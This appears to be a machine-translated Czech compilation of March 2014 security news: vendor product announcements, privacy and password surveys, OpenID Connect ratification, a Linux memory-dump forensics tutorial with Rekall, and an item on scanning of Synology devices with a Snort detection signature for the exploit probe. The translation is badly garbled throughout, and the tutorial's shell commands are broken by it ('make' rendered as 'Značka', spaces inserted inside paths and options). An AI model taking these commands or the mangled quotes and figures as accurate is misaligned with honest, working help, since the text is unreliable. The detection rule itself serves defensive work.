ZAŘÍZENÍ poskytuje jistotu zabezpečení zařízení s využitím více než 40 anti-malware motory od předních výrobců, jako Avira, BitDefender, ESET a mnoho dalších skenování vzdálených zařízení pro aktivní malware. Je to také vypadá na log ohrožení stávajícího antivirového softwaru identifikovat hrozby, které nemohou být sanace nebo že uživatel opakovaně stahování. To také umožňuje lepší přehled a kontrolu nad aplikacemi pro ochranu koncových bodů a jejich stav umožňuje administrátorům rychle odhalit a napravovat dodržování problémy. Powered by OPSWAT je OESIS rámce, může detekovat a nápravě bezpečnostních aplikací, včetně antiviru, firewallu, šifrování pevného disku a mnoho dalších. ZAŘÍZENÍ také sleduje nežádoucí aplikace, jako jsou sdílení souborů veřejnosti, a stav systému, včetně toho, zda je uživatel chráněn heslem. KOLA mohou být integrovány do zabezpečených přístupových řešení poskytují další vrstvu výkonu pro vzdálené uživatele. Vzdálení uživatelé se snaží získat přístup k síti přes bezpečnostní třetí-party řešení, mohou být testovány na malware a hodnoceny za dodržování zásad podmíněnosti. Kromě toho mohou odborníci na bezpečnost využít expanzivní pohodové API pro integraci ZAŘÍZENÍ do vzdálené monitorování a správu platformy pro větší viditelnost a ovladatelnost koncových bodů. Uživatelé mohou spravovat až 25 přístrojů zdarma po registraci na účet OPSWAT Gears. Pro uživatele se zájmem sleduje více než 25 zařízení, navštivte naši kontaktní stránku se dostat do kontaktu se zástupcem OPSWAT.
OpenID Foundation spouští OpenID Connect standard
7.3.2014 Bezpečnost
OpenID Foundation dnes oznámila, že její členství ratifikoval standard OpenID Connect. OpenID Connect je efektivní, jednoduchý způsob, jak aplikace pro outsourcing podnikání podepsaly uživatelů do specializovaných operátorů totožnosti služeb, tzv. Identity Providers (IDP). A co je nejdůležitější, aplikace i nadále řídit své vztahy se svými zákazníky, ale outsourcing drahé, rizikové podnikání ověření totožnosti na ty lépe vybavené profesionálně řídit.
To bylo provedeno po celém světě internetových a mobilních společností, včetně Google, Microsoft, Deutsche Telekom, salesforce.com, Ping Identity, Nomura Research Institute, mobilních operátorů a dalších podniků a organizací. To bude postaveno do komerčních produktů a realizovány v open-source knihovny pro globální nasazení. "Google sází na velký OpenID Connect, protože je to jednoduché pro vývojáře k pochopení a usnadňuje sdružování s poskytovateli identity. To také chrání uživatele pouze o sdílení informací o účtu, aby uživatelé nám explicitně říct, "řekl Eric Sachs, Group Product Manager identity. "K dnešnímu dni, Google nabízí podporu pro OpenID Connect jako poskytovatele identity a jsme rádi, že viděli, jak bude tato norma využívají Internet jednodušší pro uživatele, aniž byste museli zadávat hesla." formalizaci OpenID Connect jako otevřený globální standard umožňuje vývojářům , podniky, vlády, accreditors, a další zúčastněné strany k vybudování vytvoření a přijetí specifických pro určitá odvětví OpenID Connect profilů do 2.014 plánů a priorit. OpenID Foundation, Open Identity Exchange, a GSMA spolupracují na pilotních a poznávacích projektů a 2014 začne testovat, jak implementace OpenID Connect může zlepšit on-line výběr, efektivitu, bezpečnost a soukromí. Proč OpenID Connect? Stěží uplyne týden, aniž další reportáž o nějaké internetové čelí organizace trpí škodlivé porušení dat, často včetně hesel, někdy číslování v desítkách milionů. Neustálé bubnování datových porušení poškozuje pověst organizací "Internet jako celek, a zejména důvěra uživatelů internetu po celém světě. OpenID Connect poskytuje jednoduchý, standardní způsob, jak zadávat místa a aplikační přihlášení do systému provozovatele, kteří neustále investují do sofistikované Ověřování infrastruktury a kteří mají specializované dovednosti potřebné k bezpečnému řízení Sign-in a odhalit zneužívání. OpenID Connect staví na základech úspěšných open identity a bezpečnostních norem, jako je OAuth 2.0 a TLS (také známý jako SSL, nebo "https"). Jako výsledek, to má tu výhodu, je to, že je v podstatě jednodušší pro vývojáře a realizovat nasazení než jiné identifikační protokoly, což umožňuje jednodušší nasazení, aniž by byla obětována bezpečnost.
Linux Memory Dump s Rekallu
7.3.2014 Incidenty
Paměť dumpingu reakce na incidenty není nic nového, ale od té doby se uzamčena přímý přístup k paměti (/ dev / mem) na Linuxu, jsem měl špatné zkušenosti dumping paměti. I obvykle skončí shazovat server asi 60 procent času při sběru dat s Fmem.
Nová verze Linux paměti dumpingu utility Rekallu (předchozí s názvem Winpmem) nedávno vyšel. Já jsem testoval to na nejnovější verzi Ubuntu a RedHat EL 5 a ještě narazit na žádné problémy s kolekce.
Pokud máte to štěstí, že prostředí, ve kterém máte skupiny serverů se stejnými úrovněmi náplasti, měli byste spustit následující kroky na non-kompromitaci serveru. Navíc, pokud je ohrožena systém VM, můžete naklonovat, a provádět tyto akce na klonu. Ujistěte se, že budete sbírat všechny ostatní těkavé údaje (MACtimes, lsof, PS atp ..), než se výpis paměti, protože to může ještě způsobit nestabilitu systému a nechcete přijít o data.
Příprava k odběru
Nainstalujte Linux Kernel záhlaví
Ubuntu
> Sudo apt-get install linux-headers-server zip
CentOS / Redhat
> Yum install kernel-headers GCC
Stáhněte si a kompilace Rekallu
Když spustíte makefile, automaticky se vytvoří část profilu na serveru. To bude muset být kopírován mimo server pro analýzu.
> Wget http://downloads.rekall.googlecode.com/git/Linux/linux_pmem_1.0RC1.tgz
> Tar-zxvf linux_pmem_1.0RC1.tgz
> Cd linux
> Značka
Poznámka: Pro Redhat / CentOS systému, budete muset nastavit proměnnou Makefile KHEADER.
Zkopírujte tento soubor do svého analýzu stroje volatilita pod volatility adresáři / plugins / překrývání / linux /.
Načíst ovladače jádra
> Sudo insmod pmem.ko
> Sudo lsmod | grep pmem
pmem 12680 0
Sbírejte paměti
Teď, když je disk vložen, nové zařízení je k dispozici / dev / pmem. Chceme kopírovat paměti na externí zařízení / akcii.
Počet položek v {} je třeba změnit na mimořádné události, aby byly užitečné pro analýzu
> Dcfldd if = / dev / pmem bs = 512 conv = noerror, sync of = / {USBDRIVE} / mount / {servername.date}. Memory.dd hash = md5, sha256 hashlog = / {USBDRIVE} / {servername.date }. memory.dd-hash.log
Uvolnění ovladače
> Sudo rmmod pmem.ko
Analýza pomocí Rekallu
Nyní, že kolekce je dokončena, musíme být schopni zkoumat výpis stavu paměti. Zkopírujte obraz paměti do analýzy pracovní stanici.
Nainstalujte Rekallu
> Sudo apt-get install python-pip python-dev
> Sudo pip nainstalovat Rekallu
Build Rekallu profil
Nyní je třeba vytvořit profil, který bude pracovat s Rekallu. Převést soubor, který byl zkopírován ze serveru a název něco užitečného pro budoucí analýzu.
> Rekal.py convert_profile 3.5.0-45-generic.zip Ubuntu3.5.0-45-generic.zip
> Rekal.py - profil ./Ubuntu3.5.0-45-generic.zip-f / media / mem.dd pslist
Chcete-li zadat interaktivní shell, nechcete přidat plugin na příkazovém řádku
> Rekal.py - profil ./Ubuntu3.5.0-45-generic.zip-f / media / mem.dd
Chcete-li zobrazit dostupné pluginy, použijte interaktivní shell:
> Rekal.py info [tab] [tab]
plugins.arp plugins.check_idt plugins.convert_profile plugins.dwarfparser plugins.info plugins.lsof plugins.null plugins.psaux plugins.vmscan
plugins.banner plugins.check_modules plugins.cpuinfo plugins.fetch_pdb
.....
Chcete-li získat více informací o konkrétním plugin používat? po Earth název
mem 12:38:31> plugins.pslist?
Některé z více užitečných pluginů jsou:
plugins.bash-hledá historie bash
plugins.check_modules-List načíst moduly
plugins.dmesg - shromažďuje dmesg vyrovnávací paměti
plugins.lsof
plugins.netstat
plugins.pslist
Volitelné (Chcete-li použít volatilita pro analýzu)
Jsem strávil mnoho času na to, ale volatilita nebude moci používat Rekall výchozí profil. Můžete také provést níže uvedené kroky a přečtěte si výpis paměti volatility. Hádám, že je zapotřebí pouze malé změny v souboru, ale já jsem kopal hlouběji v tomto okamžiku.
> Sudo apt-get install dwarfdump
> Wget https://volatility.googlecode.com/files/volatility-2.3.1.tar.gz
> Tar-zxvf volatilitu 2.3.1.tar.gz
> Cd volatility-2.3.1/tools/linux
> Značka
> Zip Ubuntu {Kernel ver}. Zip. / Module.dwarf / boot/System.map- `uname-r`
Pro více informací o Rekallu
http://docs.rekall.googlecode.com/git/tutorial.html
Pro více informací o nestabilitě analýzy Linux
https://code.google.com/p/volatility/wiki/LinuxMemoryForensics
Tom Webb
Port 5000 provoz a šňupat podpis
7.3.2014 Bezpečnost
ISC Reader James Lay zachytil záhadný portu 5000, provoz a pokud nám kopii paketů a odfrknutím podpis. Díky James! Vaše úžasné!
Provoz je skenování TCP port 5000. Po navázání spojení odešle "GET / Webman / info.cgi? Host = '"
Zdá se, že skenování Synology DiskStation Manager zařízení, která jsou citlivá na odlehlé kódu exection exploit zveřejněna v říjnu 2013. V současné době je Metasploit modul k dispozici pro zranitelnosti.
Díky Jamesovi na následující Snort podpisu.
upozornění tcp $ EXTERNAL_NET any -> $ HOME_NET 5000 (msg: "SERVER-WebApp Synology DiskStation Manager odražené XSS pokus přes UPnP", průtok: to_server, založena, obsah: "/ Webman / info.cgi | 3f | host ="; fast_pattern : pouze, http_uri, metadata: politika vyrovnaného ips pokles, politika připojení-ips pokles, politika bezpečnostní-ips pokles, reference: url, ? www.scip.ch/en/ vuldb.10255 , classtype: Snažíte-admin, sid: 10000130, rev: 1 ;)
Následujte mě na Twitteru: @ markbaggett
Existuje několik šancí k zaregistrujte se SANS Python programovacím kurzu. Kurz začíná od samého počátku, za předpokladu, že nevíte nic o programování nebo Python. Kurz je self chodil učení a my pokrýt základy, než začneme stavební nástroje, které můžete použít ve své příští bezpečnosti angažmá. Zamilujete si ho! Připojte se mi Python pro penetraci testerů v Reston VA březnu 17-21 nebo SANSFire v Baltimore června 23-27.
http://www.sans.org/event/northern-virginia-2014/course/python-for-pen-testers
http://www.sans.org/event/sansfire-2014/course/python-for-pen-testers
CSA up ante na virtuální Hackathon
6.3.2014 Kongresy
Cloud Security Alliance (CSA) dnes oznámila, že zvyšoval ante, protože nikdo zatím nebyl schopen proniknout Software Defined Perimeter (SDP) sítě, protože soutěž začala v pondělí.
Pro virtuální Hackathon, se registrovaní účastníci z celého světa, byl dán IP adresy cílového souborového serveru, stejně jako SDP komponenty je chrání. To v podstatě simuluje "" zasvěcených útok "- po vzoru reálného světa prostředí -. Jak na privátním cloudu a veřejné cloudové infrastruktury Účastníci mají také přístup k referenčním SDP systému se naučit, jak systém funguje naplánovat svůj útok. Hackathon je postaven na veřejném cloudu bez zvláštní ochrany, s výjimkou těch, poskytuje Software Defined obvodu. Pomáhá ověřit koncepci, že softwarové komponenty, může poskytnout tolik ochranu před síťovými útoky jsou fyzické systémy. První účastník úspěšně zachytit cílovou informace o chráněném serveru je obdrží hrazenou cestu do Black Hat USA 2014, jakož i na DEF CON 22. konference (původně to bylo jen DEF CON), včetně vzduchu a hotel, který se konal v Las Vegas 6-10 08. 2014. "Věříme, že SDP je zásadní změna v tom, jak se blížíme zajišťující sítě a jsou vyzývány, že nikdo nemá byli schopni proniknout prototyp ještě, "řekl Bob Flores, soudce případě, bývalý technický ředitel CIA, a prezident a generální ředitel společnosti Applicology Incorporated. "Chceme vyzvat všechny zainteresované strany, kdekoli na světě, pro testování bezpečnosti SDP sítě." Software Defined Perimeter (SDP) Iniciativa je CSA projekt zaměřený na rozvoj architektury pro zajištění spotřební zařízení, cloud infrastruktury, jakož i jako "internet věcí", s využitím cloud pro vytvoření vysoce zabezpečené a důvěryhodné end-to-end sítí mezi jakýmikoli adresovatelných subjekty IP. Úplná pravidla soutěže a registrace jsou k dispozici na zde . Hackaton bude trvat až do patnáct hodin PST 27. února
Spotřebitelé chtějí soukromí, ale nemusí využít opt-out technologií
6.3.2014 Bezpečnost
Většina spotřebitelů si starosti o tom, jak obchodníci využít své osobní údaje, ale 79 procent je více pravděpodobné, že poskytnutí osobních údajů, aby to, co považují za "důvěryhodné značky," podle nové studie chování spotřebitelů od SDL.
Průzkum také ukázal, že zatímco spotřebitelé nejsou spokojeni s tím, že "sledovat" v kamenném obchodě, mají tendenci nečetl zásady ochrany osobních údajů značky ", nebo přijmout opatření, aby opt-out, web sledování postupů. Studie zkoumal více než 4000 spotřebitelů ve Spojených . státy, Velká Británie a Austrálie shrnutí klíčových zjištění patří následující:
Spotřebitelé odměna důvěryhodné značky: Globálně, 79 procent respondentů je větší pravděpodobnost, že poskytnutí osobních údajů na "důvěryhodné" značky. Zjištění zdůrazňuje potřebu značek využívajících digitální marketing rozvíjet důvěru a pochopit, jaké informace jsou spotřebitelé ochotni vyměnit se značkou.
Ochrana osobních údajů naráží na odpor: Celkově 62 procent respondentů starat o tom, jak jsou obchodníci používají své osobní údaje. Výsledky naznačují, kulturu odolnosti proti sdílení dat on-line.
Starší spotřebitelé obávat více: Ve Spojených státech, 59 procent spotřebitelů mezi věky 18 a 29. obav o ochraně osobních údajů ve srovnání s 71 procent ve věku 45 a 60 mezi. Tam je menší zájem o ochraně osobních údajů celkově ve Velké Británii (48 procent v mladší generaci, 63 procent starší), zatímco australské spotřebitelů odráží méně generační propast (60 procent mladší, 66 procent starší).
Spotřebitelé, kteří jsou ochotni podělit se některé detaily: Z položek, které spotřebitelé jsou nejvíce ochotni se podělit, pohlaví, věk a příjem na vrcholu seznamu. Nicméně, jméno manžela, seznamy rodiny a přátel a čísla sociálního pojištění jsou věci, které většina spotřebitelů nebude sdílet se značkami.
Spotřebitelé odmítají in-store sledování: Z těch respondentů, kteří mají smartphonu, 76 procent nejsou spokojeni s sledování prodejci v obchodě pohyby pomocí smartphonu a bezplatné Wi-Fi připojení na internet.
Spotřebitelé nejsou pomocí funkce ochrany osobních údajů: Zatímco spotřebitelé mají obavy o tom, jak se s jejich údaji nakládá, 72 procent globálních respondentů zřídka nebo nikdy nepoužívejte "Do Not Track" nebo "Incognito" rysy, které by umožnily, aby opt-out sledování webových stránek .
Spotřebitelé přeskočit webových zásady ochrany osobních údajů: Celkově 65 procent zřídka nebo nikdy nečetl webové stránky zásadách ochrany osobních údajů před nákupem. Čtenáři nejvíce aktivní politiky jsou v Austrálii - kde 44 procent vždy nebo často číst drobné písmo.
McAfee rozšiřuje komplexní ochranu před hrozbami
6.3.2014 Ochrany
Na konferenci RSA , McAfee oznámila rozšířené schopnosti najít, zmrazit, a opravit pokročilé hrozby rychleji vyhrát boj proti vyspělých a úhybných cílených útoků.
Součástí připojeného přístupu McAfee Security, McAfee Komplexní ochrana před hrozbami řešení těsně váže a akcie hrozbách a pracovní postupy napříč koncovými body, sítě a cloud. Poskytuje ochranu, výkon a provozní úspory, které není možné z bodových výrobků, které nejsou určeny k optimalizaci bezpečnosti a řízení rizik jako funkce IT a nést zatížení manuálních integrace. Od loňského roku McAfee má lepší protiopatření k dispozici zákazníci a přidány nové analýzy, kontext a orchestrace plně integrovat a automatizovat procesy na ochranu hrozba.
Odhaluje více než 800 milionů pokročilých síťových únikové metody: Next Generation Firewall detekuje škodlivý provoz, který se pokusil zamaskovat sebe tím, že rozdělení na kousky, které se pohybují v různých protokolů prostřednictvím různých vrstev OSI zásobníku. Nyní, Firewall McAfee Next Generation může komunikovat s připojeným platformu zabezpečení vzdělávat koncové body a další bezpečnostní síť výrobky o těchto událostech.
Více informací o malware: McAfee Threat Defense Advanced kombinuje dobrou pověst, a emulace v reálném čase obrany s in-hloubkové statické kódu a dynamické, malware analýzy (tzv. sandboxu) poskytovat nejpodrobnější hodnocení a údaje o klasifikaci malware. Integrace s McAfee Threat Intelligence Exchange můžete sdílet všechny tyto informace a navíc dynamický soubor a IP pověst, prevalenci a malware řídit pult-reakce a vzdělávat každou komponentu zabezpečení v podnikovém prostředí, rozpoznat a zablokovat vznikající a cílené hrozby.
Najdi, zmrazení, a opravit během několika milisekund: Na rozdíl od jiných tzv. sandboxu technologií, může McAfee Threat Defense Advanced přímo přijímat soubory pro analýzu z a odeslat výsledky na koncový bod sítě a systémy řízení, využití Security Connected platformu pro optimalizaci pokročilou detekci a analýzu malware a zastavit malware v jeho stopách a to bez času a úsilí vynaložené na integraci.
Pokračování rozšířit své komplexní řešení ochrany před hrozbami, McAfee nedávno oznámila McAfee Threat Intelligence Exchange, který podílí na lokální i globální informace hrozba zpravodajských a bezpečnostních produktů v rámci celého podniku do jednoho soudržného integrovaného bezpečnostního systému odstranit mezeru mezi setkání a omezení pokročilých cílených útoků. Schopnost rychle na místě a předjímat pokročilé hrozby je nyní obchodní derivační, protože společnosti se snaží chránit své duševní vlastnictví a zajistit zákazníkům, že jejich data jsou v bezpečí. Připojeno strategie McAfee Security integruje data a pracovních postupů pro automatické odpovědi. Inteligence Threat sdílené mezi sítí a koncový bod pomáhá McAfee protiopatření, aby okamžitě vypnout příkaz-a-kontrolní komunikace a karanténní narušených systémů. Například Security Platform McAfee Network můžete použít návod od McAfee Enterprise Security Manager blokovat komunikaci s infikovanými hostiteli.
Trh Správa identit vztah k vyšší než 50 miliard dolarů do roku 2020
6.3.2014 Kriminalita
ForgeRock dnes oznámila, že řízení vztahů identity (IRM) na trhu, zaměřená na správu interakce se zákazníky napříč libovolné zařízení nebo životního prostředí, bude vyšší než 50 miliard dolarů do roku 2020.
Tento vysoký růst trhu trajektorie odráží rostoucí potřebu efektivní IRM řešení, jak CIO přesun investic z interních projektů identity se zaměřením na "držet věci" na masivní externí projekty totožnosti zaměřených na zvýšení zapojení zákazníků a zpeněžit tyto příležitosti. identit služby musí být v místě bez ohledu na odvětví - maloobchod, finance, pojišťovnictví, zdravotnictví, státní správy, cloud služby, vzdělávání - s cílem rozšířit obchodní dosah přes sociální, mobilní, oblačnosti a internetu věcí. Podle sítí obří Cisco, odhadem 8,7 mld. věci byly připojení k Internetu v roce 2012, očekává se růst na 50 miliard připojených k Internetu věcí v roce 2020. ForgeRock odhaduje, že každý připojený k Internetu věcí (PC, tablet, mobilní telefon, auto, lednička, TV, atd.) budou vyžadovat služby identit tak, aby rozhodnutí o přístupu uživateli v reálném čase na základě kontextu (umístění, IP adresa, známé zařízení, atd.). Vzhledem k tomu, internet věcí (Internet věcí) roste, ForgeRock očekává nárůst počtu žádostí slouží každé zařízení, hnací zvýšení příjmů totožnosti na zařízení -. Přibližně 50 miliard dolarů na celkových příležitosti "Oracle, IBM a CA jsou starší prodejci při jde o identitu "řekl Scott McNealy, spoluzakladatel a bývalý generální ředitel společnosti Sun Microsystems a poradce / investor ForgeRock. "Oracle ujít velkou příležitost využít na open source platformě Sun a CA a IBM se neotevřely své identity platformy soutěžit v moderní éře otevřených, interoperabilních software. ForgeRock je další generace, open-source platforma Identity Relationship Management postaven na rozsahu a spolehlivosti technologie Sun telco třídy. Všichni víme, jak tyto příběhy končí - lidstvo vítězí nad každou jednotlivou proprietární dodavatele. ForgeRock je vybudování nové generace platformy pro lidstvo. " Na oslavu obrovskou příležitost, ForgeRock dnes překvapil RSA konference účastníků s flash mob, který upozornil na rostoucí význam identity s olovem ve zprávě "Nikdo staví do rohu identitu , "hravě odkazem na hit klasický film," Dirty Dancing ".
Skupina, složená ze zaměstnanců ForgeRock, dobrovolníků a profesionálních tanečníků podobně, provádí na ulicích mimo Moscone Center několikrát, tančí na mashup hudby od "Dirty Dancing" a "Muži v černém", zatímco RSA účastníci sešli vidět to, co se děje. "ForgeRock vize je transformovat trhů usnadněním zvýšený přístup k zákazníkům a partnerům i když naše příští generace IRM platformě," řekl Mike Ellis, generální ředitel, ForgeRock. "Jsme svědky vážné narušení v průmyslu jako organizace roll-out více dynamické služby pro zákazníky, vyhlídky a dodavateli, které reagují v reálném čase informace o totožnosti uživatele a kontextu této interakce s uživatelem."
Zdarma nástroj vám pomůže odrazit většinu kybernetických útoků
6.3.2014 Nástroje | KyberWar
Dnes na konferenci RSA Qualys oznámila, že spolupracuje s SANS Institute a Rady o kybernetické bezpečnosti vydat nový bezplatný nástroj, který pomůže organizacím realizovat Top 4 Critical Security Controls odrazit útoky. nový nástroj , pomáhá organizacím rychle určit, zda na PC v jejich prostředí, jsou řádně prováděny na ovládací prvky Top 4 kritické zabezpečení, které Rada na základě odhadů kybernetické bezpečnosti může pomoci společnostem zabránit 85% z kybernetických útoků. "Qualys Top 4 nástroj je velmi elegantní a efektivní řešení, které pomáhá i malé a velké podniky zjistit, jak odolné jsou na dnešních pokročilých hrozeb, "řekl Jonathan Trull, CISO pro stát Colorado." To je přesně ten typ veřejno-soukromého partnerství naše země potřebuje k řešení kybernetické útoky ohrožují naši ekonomiku a kritické infrastruktury. " Postaveno na QualysGuard Cloud Platform, nová Top 4 cloud služeb pomáhá firmám snadno a rychle zjistit, zda Windows PC v jejich prostředí, zavedli Top 4 ovládací prvky pro: 1. Aplikace Whitelisting - pouze umožňuje schválený software ke spuštění. 2. Aplikační záplatování - udržování aplikace, plug-iny a další software aktuální. 3. OS Instalace oprav - udržování operační systémy v aktuálním stavu pomocí nejnovějších oprav. 4. Minimalizace oprávnění správce -. zabránit škodlivému softwaru v provádění tiché změny IT administrátorům pak můžete použít zpráv z bezplatný nástroj pro sledování koncové body, které nejsou v souladu, a uplatňovala nezbytná opatření, aby byly odolnější vůči útokům. "Síla kritické bezpečnostních kontrol, které odrážejí kombinaci znalosti skutečných útoků a účinné obrany z odborníků, kteří mají rozsáhlé znalosti o současných hrozbách, "řekl Philippe Courtot, předseda představenstva a generální ředitel společnosti Qualys. "Postavili jsme to cloud službu ve spolupráci s SANS Institute a Rady kybernetické bezpečnosti, které pomohou organizacím zajistit, aby se tyto ovládací prvky jsou na svém místě a jako výsledek identifikace počítačů v jejich prostředí, které vyžadují okamžitou pozornost."
Zdarma cloud anti-spam e-mailové služby pro malé a střední podniky
6.3.2014 Bezpečnost
Halon Security oznámila Inumbo.com, smlouva, zdarma, pay-as-you-go cloud anti-spam e-mailovou službu pro malé a střední podniky. emailová služba je poháněn podnikové třídy anti-spam řešení společnosti určené pro hosting, datové centrum, a poskytovatelů cloud služeb. Inumbo.com nevyžaduje žádnou smlouvu nebo up-front investice a je zdarma až pro 10 uživatelů.
Obsahuje halonů je snadný otevřené API pro rychlou integraci ze strany poskytovatelů služeb a integrátorů, s možností hybridního řešení pro klienty, kteří nevyžadují plnou cloud nasazení. Inumbo.com offers datových center na různých místech po celém světě, který umožňuje uživatelům svobodu vybrat si nejlepší, nejbezpečnější místo pro ukládání a zpracování jejich citlivá data při plnění jejich požadavků na dodržování předpisů. služba běží na Google Compute Engine a Rackspace Cloud servery pro téměř nekonečnou škálovatelnost a poskytuje otevřené API pro rychlou integraci ze strany integrátorů a poskytovatelů služeb. Průkopnická Doména Based Authentication zpráv, zpráv a shody (DMARC) technologie chrání proti falšování a phishingových útoků, které jsou populární zbraně pro hackery dnes. Halon Security podporuje komerční i open-source platformy s vylepšení rychlosti na jeho řešení, které, ve srovnání s jeho konkurenti, využívá hardware efektivněji a snižuje náklady. Mezi další funkce patří podpora IPv6. "Bezpečnost by neměla být drahé a komplikované. Naším cílem v Halon zabezpečení je, aby bezpečnost tak jednoduché, jak je to možné, aby všechny podniky mohou chránit svá data, "řekl Jonas Falck, Halon Bezpečnostní ředitel. "Malé a střední podniky a poskytovatelé podobně potřebují robustní, ale bezbolestné řešení pro řešení vybuchující množství zákazníků spam."
Špatné zabezpečení dat návyky spotřebitelů, by měla bát zaměstnavatele
6.3.2014 Zranitelnosti
Spotřebitelé nejsou získávání údajů o jejich osobní notebooky nebo stolní počítače správně, pokud vůbec, podle výsledků průzkumu Harris Poll zadala WinMagic. a pouhých 14 procent z těch, kteří vlastní notebook nebo stolní počítač šifrování svých osobních počítačích, a více než čtyři z deseti (44 procent), nejsou vyzváni při spouštění svého počítače zadat heslo.
Většina z těch, kteří vlastní notebook, stolní počítač nebo mobilní zařízení, tvrdí, že jejich osobní e-maily (62 procent), osobní fotografie a videa (54 procent) by byl ohrožen, pokud jejich osobní notebook, desktop nebo mobilní zařízení, byly ztraceny nebo ukradeny. Téměř čtyři z deseti (38 procent) by ztratil své bankovní údaje. "Jsem-li IT manažer nebo C na úrovni výkonné, musím předpokládat, pracovníky ve své firmě nechápu, jak zabezpečit firemní data, na základě mého čtení výsledků tohoto průzkumu, "řekl Mark Hickman, COO v WinMagic. "Koncepce šifrování-jen failsafe způsob, jak zabezpečit informace v klidu, vše je ale naprosto cizí pro spotřebitele, i když téměř čtyřicet procent z nich, aby data citliví jako bankovnictví informace o svých osobních notebooků či stolních počítačů." Další závěry expertů WinMagic čerpat z výsledků:
Práce produkt v ohrožení: Zaměstnavatelé by si měli uvědomit, že podle průzkumu, 15 procent z těch, kteří vlastní notebook, stolní počítač nebo mobilní zařízení, říkají obsah související s prací by byl ohrožen, pokud jejich notebook, stolní počítač nebo mobilní zařízení byly ukradeny nebo ztraceny , a pouze 14 procent z těch, kteří vlastní notebook nebo stolní počítač šifrování svých strojů. Pracovní ztrátě dat na jakémkoliv počítači, ať už společnost vlastněná nebo ne-klade společnost na riziko porušování shody, potřeby pro zveřejnění narušení bezpečnosti, a dalších zákonem stanovených činností, jako jsou drahé pokuty.
A / V znamená-OK mnohé: 71 procent z těch, kteří vlastní notebook nebo stolní počítač, aby firewall a / nebo anti-virus software aktuální informace o svých strojích. Tato ochrana představuje naprosté minimum, a výsledek šetření by mohlo naznačovat, rozšířený omyl, že anti-virus software je dostatečně zabezpečit stroje.
Dobře inzerované heslo osvědčených postupů nenásleduje: Pod třetina (31 procent) z těch, kteří vlastní notebook nebo stolní počítač říká, že "pravidelně měnit" svá hesla na jejich osobní notebooku nebo stolním počítači. Vzhledem k tomu, kolikrát jsou spotřebitelé připomněl změnit svá hesla, jako je nízké procento je alarmující.
Průzkum byl proveden on-line v USA, u 2047 dospělých ve věku 18 a starší, z nichž 2009 vlastnit notebook / stolní počítač. WinMagic nabízí eBook IT dotčeným o spotřebitelských zlozvyků odhalil výsledků průzkumu manažerů. EBook obsahuje doporučené postupy pro zabezpečení podnikových dat a školit pracovníky, a můžete si je stáhnout zde (nutná registrace).
Nová éra velkých řízení rizik údaje
6.3.2014 Bezpečnost
Agiliance oznámila RiskVision 7, která doly petabajtů dat provozních a bezpečnostních rizik pro řízení téměř v reálném čase workflow, inteligence a analýzy jízdních obchodní dopad a výkon.
Organizace působící v dynamicky se měnícím rizika ekosystému, vyznačující se tím, kybernetických útoků na bring-vaše-vlastní-zařízení (BYOD) a hrozby pro organizační dodavatelských řetězců. Mezitím, houbaření vládní rámců, jako NIST Cybersecurity zkoumat zastaralé, rizik a správy posouzení na základě postupů na základě manažerské názor. To vytváří naprosto nezbytné, aby se strategicky sladit cíle s analýzou dat řízený rizik z obchodních jednotek, dodavatelů, stejně jako cloud a datových center operací na optimalizaci rizik inteligenci, priorit, sanace a zprávy o auditu. V září 2013 Gartner bezpečnosti a řízení rizik Summit v Londýně, analytik Gartneru Neil MacDonald představil transformační, kontextově založené, velký přístup dat. On říkal, "Kontext je rozhodující pro soustružení obrovské množství bezpečnostních dat do žalovatelné vhled a identifikaci těch věcí, které představují největší riziko v organizaci. Organizace by měly požadovat konkrétní plány ukázat, jak jsou prodejci přidat aplikaci, identitu, a místní povědomí o svých produktech. " Teď RiskVision 7 rozpoutá definující průlomů ve velkém řízení rizik údaje, včetně: k operačnímu riziku případů použití:
Business Process připojení - Nový RiskVision objekt rámec, který umožňuje náročné datové záznamy v rozmezí od desítek tisíc až miliony, přes ERP, finanční, personální, ratingové, platby, dodavatelského řetězce, nebo jiné vlastní nebo třetích stran obchodní aplikace. Odkazy operačních rizik v podnikání pro případy použití, jako je dodavatelského řetězce, protistrany a obchodní odolnosti rizika, zmírnění multi-národních regulačních obavy týkající se procesů řízení.
Operační riziko Workflow - Nový RiskVision logický rámec, který nabízí dynamické datové pracovní postupy zefektivnit auditů operačního rizika doručením žaloby do správných oblastí, ve správný čas. Tento model je rozšiřitelný na všechny potřeby operačního rizika, např. AML, Basel II, FCPA, atd. Podporuje více než 20.000 lékařů, umožňuje operativně-efektivní využití zdrojů, a umožňuje současný personál více času pro analýzy rizik a řízení auditu.
Pro bezpečnostní rizika případů použití:
Cyber Systems Modeling - sbírka virtualizovaných a fyzických aktiv, aplikací, databází, identity a místa na korelují data z bezpečnosti a IT nástrojů, vytváření sanačních opatření na agregované úrovni, že priority opatření ke zmírnění rizika a reakce.
Mobile Data Korelace - atributy dat Mobilní subjekt skóre riziko korelace OS a aplikací, hrozba kanály a uživatelské identity vně a uvnitř firemní firewall, před a po připojení zařízení k síti. Připravuje organizaci řídit nové a nechráněné ohrožení vysoké riziko vektor - Rogue aplikace vstupují do podnikových sítí prostřednictvím mobilních zařízení.
Pro všechny případy užití:
Anywhere, Anytime Analytics - dotazníky HTML 5-založené, seznamy volání, analýzy rizik, a ad-hoc zprávy nyní k dispozici na všech přenosných zařízení, jako jsou notebooky, tablety a chytré telefony - kdekoliv, kdykoliv. Umožňuje organizacím analyzovat velké datové sady rizik a zprovoznit automatizaci procesu rozhodování na základě rizik pro uživatele mimo compliance, bezpečnosti a IT.
Grafická vizualizace - Auto-diagramů složité pracovní postupy ve snadno vidět a interaktivních pohledů. Rozšiřitelná na grafické vizualizace organizační hierarchie a podnikových architektur zahrnujících vztahy datových rizika. Umožňuje obchodní přijetí uživateli sofistikovanějších systémů pracovních postupů, klasifikace majetku, dědické a propagace.
"Agiliance vyhýbá status quo v oblasti řízení rizik tím, že nahradí manažerské názor a taktické poradenství s účelovým, velký roztok dat pro zákazníky a partnery pro správu výkonnosti podniku," řekl Joe Fantuzzi, prezident a generální ředitel společnosti Agiliance. "Moderní řízení rizik vyžaduje data v reálném čase a obchodní soběstačnost, takže majitelé riziko může reagovat na obchodní, rady a požadavky regulátora na včasné a přesné módy. RiskVision 7 kroužků v novém roce s velkým řízení a značek rizik údaje začátek konce malého řízení shody údajů. " RiskVision 7 je k dispozici ihned. Ceny začínají na 25000 dolarů za aplikace za rok.
97% z SaaS prodejci používají na bázi jazyka SAML single sign-on
6.3.2014 Bezpečnost
